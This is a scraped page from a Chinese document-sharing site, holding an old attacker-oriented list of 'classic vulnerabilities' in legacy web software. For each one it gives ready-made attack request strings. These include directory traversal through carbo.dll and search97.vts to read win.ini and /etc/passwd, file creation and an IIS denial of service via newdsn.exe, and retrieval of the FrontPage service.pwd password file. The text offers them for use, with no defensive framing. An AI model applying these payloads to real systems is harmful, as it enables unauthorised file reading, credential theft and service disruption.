- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
[经典漏洞详解
☆carbo.dll☆
iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,
这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).
攻击方法:
提交这样的http请求 :
http://host/carbo.dll?icatcommand=file_to_viewcatalogname=catalog
http会做如下回应:
[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]
Error: (-1007) cannot open file ’C:\web\carbohome\file_to_view.htm’
查看win.ini文件: c:\winnt\win.ini:
http://host/carbo.dll?icatcommand=..\..\winnt\win.inicatalogname=catalog
___________________________________________________________________________
☆uploader.exe☆
如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。
攻击方法: http://host/cgi-win/uploader.exe ;
会带你到上传页面,剩下的事就不用我告诉你了把?:)
___________________________________________________________________________
☆search97.vts☆
这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取的文件。
攻击方法: /search97.vts ;
?HLNavigate=Onquerytext=dcm
ServerKey=Primary
ResultTemplate=../../../../../../../etc/passwd
ResultStyle=simple
ResultCount=20
collection=books
___________________________________________________________________________
☆newdsn.exe☆
个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。另外,在某些特定条件下,
利用newdsn.exe可能使IIS遭受拒绝服务攻击,如果攻击成功,将导致IIS停止响应连接请求。
攻击方法:
1. 创建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft+Access+Driver+(*.mdb)dsn=Evil2+samples+from+microsoftdbq=../../wwwroot/evil2.htmnewdb=CREATE_DBattr=
2. D.o.s攻击:提交下列连接请求:
/Scripts/Tools/Newdsn.exe?Createdatabase
如果IIS是有问题的版本,浏览器将不会显示任何信息。当下列两种情况中的任意一种发生时,都会导致拒绝服务:
- 重新启动WWW服务时: 这将导致IIS挂起。不能重新启动WWW服务,总是显示端口已经被占用的错误信息。
- 停止WWW服务: IIS将会停止 。但是IIS的数据库部分并没有死掉,仍然会响应80端口发来的请求,因此,
如果再次提交一个请求: /Scripts/Tools/Newdsn.exe?Createdatabase ;
IIS会产生保护性错误。
___________________________________________________________________________
☆service.pwd☆
/_vti_pvt/service.pwd可读,将暴露用户密码信息.
攻击方法:
访问http://host/_vti_pvt/service.pwd ;[service.pwd]正是所需要的密码文件,如果我们粗心的网管没有设置权限的话,那浏览器就会显示出对方的密码文件
您可能关注的文档
最近下载
- (人教版)一年级上册科学 观察物体教案.doc VIP
- 基于新课标“教学评”一体化的小学语文教学设计与实施 培训课件.pptx
- 陶艺课程--校本特色课程-专题讲座.pptx VIP
- 离心泵基础知识(最终版)_图文.ppt VIP
- 基于STM32单片机的智慧病床控制系统设计.pdf VIP
- 基于STM32单片机的智慧病床控制系统设计.docx VIP
- 心力衰竭病人的护理【共27张PPT】.pptx VIP
- 部编版五年级上册语文第一次月考试卷(含答案)4999.docx VIP
- 移动电商视觉营销教案学说课.pdf VIP
- 2024-2025学年北京市房山区七年级上学期期中考试语文试题(含详细答案解析).docx VIP
文档评论(0)